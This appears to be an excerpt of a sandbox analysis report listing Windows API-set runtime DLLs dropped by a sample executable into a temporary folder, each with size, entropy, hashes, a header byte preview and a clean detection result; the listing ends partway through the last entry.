Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...0..........." .........0...............................................@......?.....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.47889633663313
Encrypted:	false
SSDEEP:	192:AcWBhWfWYnO/VWQ4SW35VXC/uuOiqnajBirNin:AcWBhWPUmilliYn
MD5:	E56F2D05D147ADD31D6F89BCD1F008CA
SHA1:	DDE258C7B42B17363BCA53B5554A5E13EA056F80
SHA-256:	8A4B66CEA7B474506FBDBE4C45E78923645F5F0A13F7F4E43449649F50EA38B8
SHA-512:	9FD1AFD32FDA24A92AF4BB24661F7CF791CC6686B65F13DAE97C56A1E83B25F0F2710C77167E6A9A491001877A0712C9A011833BB6026E08AE536744F0B40905
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...?YRy.........." .........0...............................................@......+.....`A........................................p...l............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.413709400148906
Encrypted:	false
SSDEEP:	192:swWBhWiWYnO/VWQ4eWjSlCJky1qnajgajMK2m:3WBhWYUwR1lscM5m
MD5:	F08CD348AC935AC60436AC4CB1836203
SHA1:	FD0608E704677FD4733296C2577647057541F392
SHA-256:	E8382A73730C2F7F873B40E2FCC5E1CD4847E7CB42FEF3C76BEA183AF5891D65
SHA-512:	595E08301A0CBFD4F943EA3555DBCE27D37B16C340B6972B054097B889285BBF942CC0314797A714A2E393956075C5DD95A5D2C2D4BDE143B5F5387793E7A8DE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d.....&*.........." .........0...............................................@......T.....`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.616290819717223
Encrypted:	false
SSDEEP:	192:8FpWBhWCQWYnO/VWQ4SW5u6f/uuOiqnajByW:8FpWBhWZUVxillyW
MD5:	88916EED5164CB8884EBBA842CD540CC
SHA1:	F15674FBFEF5B09CC02C924336554C17B715DB00
SHA-256:	9C1AFC7CD0B0E0D136D09B65DD082ACE136FC306F8F116F3D13956211EC146C8
SHA-512:	2929C3AB67B364A7CAF6C8FE1A42309917A0620F36C5D7194CA8A41AB7703A564DED32A4F9291A4F8FDD7D3A35383715FD8BEF10FF603554B95519D109469617
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...\W..........." .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.978526113519687
Encrypted:	false
SSDEEP:	192:YMck1JzX9cKSIUWBhWHWYnO/VWQ4SWzgG/uuOiqnajBLP:dck1JzNcKSIUWBhW3Upillb
MD5:	42E99C89E241F21BF2FB20F3FF477EBA
SHA1:	E3B0012CD6D74F0AC2BF0C34997A87333C895834
SHA-256:	6E5BD110A2F4DC345B68E9A8FB081783586C8C25F46027C58443ADE2D3E1BF01
SHA-512:	8EED3B21695CCCAE0DBF2DB844EFA11AD4957CD7BCD6C8AB7CFD4F0653BBACFD6BEDD82AC27C3995F6418AE38ED0B8D46AFA0BDFC627C16619AAB775C5F8DA16
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d.....@..........." .........0...............................................@.......(....`A........................................p................0...............0...!..............p............................................................................rdata..4...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.517532594497108
Encrypted:	false
SSDEEP:	192:BG+DfIe2WBhWWWYnO/VWQ4eWJAkWQLCamylqnajP3TxWXFh:BLDfIe2WBhW8UuWQ3Jllz3VSz
MD5:	D399C926466F044F183FAA723BA59120
SHA1:	A9534B4910888D70EEFBA6FCC3376F2549CB4A05
SHA-256:	19B018BE16AFE143FB107EF1DD5B8E6C6CB45966806EB3D31EC09FF0DC2B70D1
SHA-512:	FC55F4CFE7C6C63E0720971D920C5C6EAD4DB74A671F7BB8DC830AA87CB54459A62E974456875BDFDA449D82A0ACB368E3B6C2CC20C32B1B407E8DE7CC532057
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d....I..........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..,...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20960
Entropy (8bit):	4.2906497170883435
Encrypted:	false
SSDEEP:	192:vXRWBhWfWYnO/VWQ4SW9FSuUgxfzfqnaj/fc8j:/RWBhWPUZIrlzcK
MD5:	7B746CDA44A5773455C455690BA26A4F
SHA1:	D6FF8A5AC6C71E0B037236FAD32F9BBECFC68AEC
SHA-256:	CC3C609193F2E99F80A6A21064D10C5C591101E386338879326775CCDD77DCB6
SHA-512:	25FD04FACB3DDABBCB0265CD7A306D6C159AC6419A3E2FF4DE7BB9FE41EB9A1E3AFECEA6558771B9E4B3F912227DDA65021822FBE1AB52D7DCF6CD115BEA84F3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...ve............" .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata.. ...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.45718212550212
Encrypted:	false
SSDEEP:	192:/GeVGWBhW0WYnO/VWQ4eWYAz2cA5E8qnajTwdo/:/GeVGWBhWiUTx5E8lvw+
MD5:	D6FC6C9DA69334221C5438F5C7444336
SHA1:	AC385FEE49C6A4F7FF918FA93EF3324E71943505
SHA-256:	BCB9A6DD2CC0CAAA700D95FA3AF5163A8246388C2EFEFBBC4CF6E1FE2687C72E
SHA-512:	646D23590974ACF8EA523018B97D994DF4D760500C5BBDDC9D6BCBB5C0FC5665B82B40B49B7636050B83269AEA4FA802B3BE016A02403FE189CBE72FC1DE0ED5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d....t............" .........0...............................................@.......l....`A........................................p................0...............0...!..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.374106462638138
Encrypted:	false
SSDEEP:	192:X0+yMvfWBhWiWYnO/VWQ4eWQIvQLCamylqnajP3Txv:3yMvfWBhWYUIvQ3Jllz3V
MD5:	82FA7C54D034123805B57C96A5BCED7F
SHA1:	BBC6EBFFBF21996F187345B7E28B9DFECA31829E
SHA-256:	9B071B842445A5DD90148445AF148D024674085927D079864F7893807FD1B305
SHA-512:	715B2E794B2C2AF5CDEC22653D569ED33CF91BC092FAE49449111CF7450385D1E5A1C713FEAC231BCEDFA12FAB7AF57005C53F7721330400AEF7C17DABDDAFFF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...!............." .........0...............................................@......G.....`A........................................p................0...............0...!..............p............................................................................rdata..<...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.886466672903929
Encrypted:	false
SSDEEP:	384:1Xwidv3V0dfpkXc0vVatYWBhWMUdRillKI:dHdv3VqpkXc0vVaN7YVI
MD5:	6DBC816B9AEF0F91B57BFC9A3AB18972
SHA1:	E88CB7A5955630D29D24D2F05F540403ED9498E3
SHA-256:	A981A24C9231E0230031BB1CBA8F2509565ECE1F53EBDB4D0A50EFD722AB4330
SHA-512:	BFB4CFC89EB8B1409A826E59699F2C3F4AF765F114281BB30026DAD02D2353CA95EC3B544F522833E657BE4CF69B1070DC9BD3767B7A6014C2CBACBA38C023E3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d.....\..........." .........0...............................................@............`A........................................p...X............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20960
Entropy (8bit):	4.560858953494114
Encrypted:	false
SSDEEP:	192:ttZ37WBhWlcWYnO/VWQ4eWYRt3VjpC52qnajc5xI6:ttZ37WBhWlKUNNlg5
MD5:	DA5D400ADE0D2288B17DCC11ED339E25
SHA1:	F4A340079477A2C91E091968FE2D252CB01EEAE2
SHA-256:	69DD52CAFFE1EA6E0900FB9604A57A87618F8468DC68CBB2A9BCEFD1265F3F49
SHA-512:	3BFA3B4F93A0A68E1C0AC17C74C91C0A01B779961AF4811756223FD1F47A86CE1F3EBD7EE4190A2EDB84A50B1B444318965CAD3A74D1ED4ACFA014D0F5BBE34A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d................" .........0...............................................@............`A........................................p...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20928
Entropy (8bit):	4.611270780558929
Encrypted:	false
SSDEEP:	192:7+gdKIMFsmSTWBhW7WYnO/VWQ4uWrJCJky1qnajgaY+:/5NTWBhWbUlR1lsX+
MD5:	6971C41C21EB35668520F0BB949B3742
SHA1:	5DE3A45C15AFB7C2038DC7FC0D29275B7FB90A36
SHA-256:	3513CFFA44C88EC13D6A8C9B63E5D505A131B46746D13EE654144F08A96F20C3
SHA-512:	DD9914F547D5C34EFD0F2879EBFFD2D3EC9DAF7465DFFB7644AE0F4BC05F9F75DF8B49CA8D692A8DE7A92854A1B44C81E6F1B15EE691BF1995A1DA76D3C3B82A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...y.'..........." .........0...............................................@............`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.550138189146297
Encrypted:	false
SSDEEP:	192:CnWBhW+WYnO/VWQ4eWsrSgaLQLCamylqnajP3TxU:CnWBhWkUXSgaLQ3Jllz3VU
MD5:	EA5F768B9A1664884AE4AE62CEC90678
SHA1:	AE08E80431DA7F4E8F1E5457C255CC360EF1CAC0
SHA-256:	24F4530DEBF2161E0D0256F923B836AECCC3278A6FF2C9400E415600276B5A6D
SHA-512:	411DB31E994EBBC69971972E45D6E51186D8F8790E8C67660B6A846E48A5A5C53A113916A5A15D14C33D8C88037D7F252135E699CB526C4BB3B5ABD2E2DFEE7C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...C..2.........." .........0...............................................@......n~....`A........................................p...H............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.322357725639786
Encrypted:	false
SSDEEP:	192:MGWBhW4WYnO/VWQ4eWzqpQLCamylqnajP3Tx:MGWBhWmUjpQ3Jllz3V
MD5:	7FCF9A2588C1372D6104333A4CFC4603
SHA1:	8C1EA131A30178C4F250D0CEF254557FDED0D132
SHA-256:	2E1CC12F93837A4E1FE95E0C640B147BE29793705628F9C6CD91A0B5C0C50262
SHA-512:	2FB84DCEDFEDDBF41109DBADB59EDE86CEEB168DB08955DBF9395FAB7A18941CC7313BCB47CB31CFD2978540E9BEED346044E6C5B5DEFA61F59B9B78535E784B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...9.U..........." .........0...............................................@...........`A........................................p...<............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.639685067999997
Encrypted:	false
SSDEEP:	192:MWBhWRWYnO/VWQ4eWO+4CJky1qnajga3Y:MWBhWRUIR1lsU
MD5:	A5DAF7D2DD7D447196F5AA65C3B48755
SHA1:	847C75D74BE334298A8CDB414905CAD66BBF0B49
SHA-256:	1368B9AF85F186A2B35E2A744EB2103555234B32FDFBFDB94C0F5E525C588E46
SHA-512:	32B1463DEE8CBC4CCB5296B22281E014F432887EEC07773E41477ECEBBD1FB85087FF6ADC6B7AC68D5FEE818F3289DACEB2817881BDBE2838CC104D2166A9607
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...L..u.........." .........0...............................................@......B.....`A........................................P................0...............0...!..............p............................................................................rdata..@...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25032
Entropy (8bit):	4.643248320949739
Encrypted:	false
SSDEEP:	192:bjQ/w8u4cyZWBhWYWYnO/VWQ4SWcZOr/uuOiqnajBQ:TyZWBhWGUQgillQ
MD5:	CF95A8F66313283F046BA9E6E5CDBBA4
SHA1:	B25C686FCC6729A88A8776CDB75FF21CBCEB1C5D
SHA-256:	2CCB01B62188DDC051A582C128BF880608111C602534E487EC09A7CF67C22D17
SHA-512:	59F5901E513ACEEEB819C73C5B9FE2504E80AF28DF54DB19775D7C0E0481F14C21CE38E6DB207672CC10FACFDD217638829AF2D3F0F85A0A413D10E3A81DAE9C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...T.j..........." .........@...............................................P......^.....`A........................................P................@...............@...!..............p............................................................................rdata..>........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.448747166329223
Encrypted:	false
SSDEEP:	192:cObWBhWoOWYnO/VWQ4eWUbcA5E8qnajTwv:nWBhWhU3x5E8lvw
MD5:	71407C52FF12B113CC0498FDD42DB8DC
SHA1:	F0C6A3C1308177B090B2A94FEE90156E1DF6BB9B
SHA-256:	5A2AE5B270C1EAF467878E7F5DBDC689B71914BDF30293D7D46C01D9DD11BDD4
SHA-512:	B9BB29D76A144C10B234835B6006637C84103ABEB8F5DB19991F3AB2BAAABE3EA3FC1A87132263D097ADDD01AFCAD08E77C9834DCCD4C6723B3CA204F50AAC1E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...U..0.........." .........0...............................................@......Hg....`A........................................P..."............0...............0...!..............p............................................................................rdata..r...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20928
Entropy (8bit):	4.949801452507702
Encrypted:	false
SSDEEP:	192:vSnWlC0i5ChWBhWyWYnO/VWQ4yWL8xT/FMg/uuOiqnajB0:vSnWm5ChWBhWoUqwT/Iill0
MD5:	BBBF361746440219A3F7933CED5234BB
SHA1:	1E3EDEDAA28E41F51E903C2CA66E7BD048FBAEE7
SHA-256:	42A99227775E85CA8C197811A86AAD0E2AF496BD21623E4C9A2DD747571C8990
SHA-512:	F6681875BC02903676CD3EA3303920202C563A1A6E82DD687ED9BD0FAFE92C9ABBA4A6DF3E9C93F2BB0DA9DCCF0ABB4543B6A5E5F0C92FA06E809B30B84085AA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...0e.%.........." .........0...............................................@.......e....`A........................................P................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.582824387884213
Encrypted:	false
SSDEEP:	192:DFY17aFBR8WBhWUWYnO/VWQ4SWrJkn/uuOiqnajBc:DQZWBhWCUVcillc
MD5:	BACC491EB1DEE4786ADE841E7B480CD8
SHA1:	84CB8F770CDF873415403EDF48E625514AECAD02
SHA-256:	43C80120970BE1EFED3EA60BF7AA37B46FCCE946B94FB11CA6E3FFFF2F16BB29
SHA-512:	7832912F38CD6BA145AF57548C2A1D4DA3BED9392A0AB3A0FAFFE18FAB40087E1D74676E2AF004627A37F7E079B9146DCCF7AAA04E360A88443196FEDE4CCADC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d..."............." .........0...............................................@............`A........................................P................0...............0...!..............p............................................................................rdata..f...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.548467238776487
Encrypted:	false
SSDEEP:	192:w8mWBhWvWYnO/VWQ4eWOS8IQLCamylqnajP3Tx:whWBhWfU0Q3Jllz3V
MD5:	FB992BBB73E0127C70D075F81E52AAF9
SHA1:	E9D326D436E2E55C521261AD9A5B73D2E998F644
SHA-256:	6011ECE89F4833DCB4CEFB02EA366B828725205EAE6F25AB704B76FD9E5D86EB
SHA-512:	F568898A660C3850998B71A854FB5B8FFEE59F02EBE7BC8C12AD9BC68F5472A0C812CF0A8EBC096FCC462E941A86A2A46619D4F03030E7AB69A0E4A9E7B1E0B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d................." .........0...............................................@............`A........................................P...e............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29120
Entropy (8bit):	4.948896373681597
Encrypted:	false
SSDEEP:	384:sQM4Oe59Ckb1hgmLtWBhWAUFQ3Jllz3Vu3:LMq59Bb1jgrhrs
MD5:	0936C89E36A8BAC313DE187E50C61078
SHA1:	7F0E64A66301E1926FA9ACDC36AD728958CE6D78
SHA-256:	5BA8F9C2842990CCDB447FC6D22023103B03F5387F341D3375809F060B5BB4EF
SHA-512:	A72FCADC55D12C97770F1222BB3B605B7D58157F6F55814D900FE0F1B5FF8075F84914C7AC66D4B0E59EF41C01504A35C391BFB182E2E9019D152037EF4EC20F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d....KZ..........." .........P...............................................`......8X....`A........................................P....%...........P...............P...!..............p............................................................................rdata...&.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20936
Entropy (8bit):	4.612081090191734
Encrypted:	false
SSDEEP:	192:6YDdyqjd75WBhWKGWYnO/VWQ4eWiZQLCamylqnajP3Tx62N:6QQYWBhWKsUbQ3Jllz3VHN
MD5:	437E85738168DD8A2894005B01451001
SHA1:	49B20FDC8E6287E684AF3877352408BFEA71A624
SHA-256:	CFC12DD7C1DEABF35C8E0FBE01248171C49555FE2D1BED72C5FDBA2102090870
SHA-512:	025148A7278C06E20D00FB0287D0168D4C367BEF21EA8334F746B094250E488711CDB5780F8E08EBF501784B151C4BBE8CACA925F7B7268F3324DFD9F49E5612
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d.....a..........." .........0...............................................@............`A........................................P...x............0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25040
Entropy (8bit):	4.793064487556532
Encrypted:	false
SSDEEP:	192:E3UW9MPrpJhhf4AN5/Ki9WBhWp5WYnO/VWQ4mWhVvLrMhEqnajKsZ9uhO:qUZr7DWBhWp5UijlGsZp
MD5:	01380DF01B9E61FC241F82F8FB984C2D
SHA1:	18F92390B292AF0DB8AAA7C7E6F6AA24463F9B84
SHA-256:	698FA887C5B994375C9271222E21D0D4C74810E73D377AD898927549FB69DCB3
SHA-512:	743D45FAE759D8FF3EF862FFA70584696824B86991F262DDC897F6F469FBB4264CF7DA3FE001F33C6305523753D37A7A64874C5010CC7FE63252C53CD96B06F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~v..~v..~v.5.~..~v.5.v..~v.5.r..~v.5....~v.5.t..~v.Rich.~v.................PE..d...J..~.........." .........@...............................................P......(.....`A........................................P...4............@...............@...!..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25032
Entropy (8bit):	5.081534858672226
Encrypted:	false
SSDEEP:	192:XA2uWYFxEpahfWBhWqWYnO/VWQ4eWcvsBQLCamylqnajP3Txr:XIFVhfWBhWAUIQ3Jllz3Vr
MD5:	A3F3FFCDE3DD59CC94FB7DBA16715671
